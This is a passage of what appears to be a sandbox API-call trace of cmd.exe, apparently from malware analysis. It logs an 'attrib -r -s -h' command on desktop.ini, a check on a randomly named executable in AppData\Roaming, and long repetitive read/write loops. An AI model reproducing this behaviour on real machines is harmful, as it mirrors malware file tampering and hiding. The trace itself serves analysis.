lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22f59c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22f5e8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini\" ", lpProcessInformation=0x22f5e8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdb4, dwThreadId=0xbf4)) returned 1 [0225.458] CloseHandle (hObject=0x4c) returned 1 [0225.458] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0225.459] GetEnvironmentStringsW () returned 0x2f0878* [0225.459] FreeEnvironmentStringsW (penv=0x2f0878) returned 1 [0225.459] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0225.784] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22f4dc | out: lpExitCode=0x22f4dc*=0x0) returned 1 [0225.784] CloseHandle (hObject=0x50) returned 1 [0225.784] _vsnwprintf (in: _Buffer=0x22f624, _BufferCount=0x13, _Format="%08X", _ArgList=0x22f4e8 | out: _Buffer="00000000") returned 8 [0225.784] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0225.784] GetEnvironmentStringsW () returned 0x2f2598* [0225.784] FreeEnvironmentStringsW (penv=0x2f2598) returned 1 [0225.784] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0225.785] GetEnvironmentStringsW () returned 0x2f2598* [0225.785] FreeEnvironmentStringsW (penv=0x2f2598) returned 1 [0225.785] DeleteProcThreadAttributeList (in: lpAttributeList=0x22f540 | out: lpAttributeList=0x22f540) [0225.785] GetConsoleTitleW (in: lpConsoleTitle=0x22f8c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\desktop.ini")) returned 0xffffffff [0225.785] GetLastError () returned 0x2 [0225.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y")) returned 0x10 [0225.785] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0225.785] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0225.785] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\desktop.ini")) returned 0xffffffff [0225.786] GetLastError () returned 0x2 [0225.786] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22f36c | out: lpConsoleScreenBufferInfo=0x22f36c) returned 1 [0225.786] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0225.788] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0225.788] GetConsoleTitleW (in: lpConsoleTitle=0x22f85c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.789] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0225.789] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.790] GetFileType (hFile=0x50) returned 0x1 [0225.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.790] GetFileType (hFile=0x50) returned 0x1 [0225.790] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.790] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] GetFileType (hFile=0x50) returned 0x1 [0225.791] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.791] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.792] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.792] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.792] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.792] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.793] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.793] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.793] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.793] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.794] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.794] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.794] GetFileType (hFile=0x50) returned 0x1 [0225.794] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.795] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.795] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] GetFileType (hFile=0x50) returned 0x1 [0225.795] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.795] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] GetFileType (hFile=0x50) returned 0x1 [0225.796] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.796] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.796] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.796] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.796] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1fc*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f24c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f24c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f29c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f29c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f2ec*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] GetFileType (hFile=0x50) returned 0x1 [0225.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.797] WriteFile (in: hFile=0x50, lpBuffer=0x22f33c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f33c*, lpNumberOfBytesWritten=0x22e340*=0x20, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.798] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e32c | out: lpNewFilePointer=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0225.798] ReadFile (in: hFile=0x58, lpBuffer=0x22f15c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e34c, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesRead=0x22e34c*=0x200, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f15c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f15c*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f1ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e340, lpOverlapped=0x0 | out: lpBuffer=0x22f1ac*, lpNumberOfBytesWritten=0x22e340*=0x50, lpOverlapped=0x0) returned 1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] GetFileType (hFile=0x50) returned 0x1 [0225.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0225.798] WriteFile (in: hFile=0x50, lpBuffer=0x22f1fc*, nNumberOfBytesToWrite=0x50, 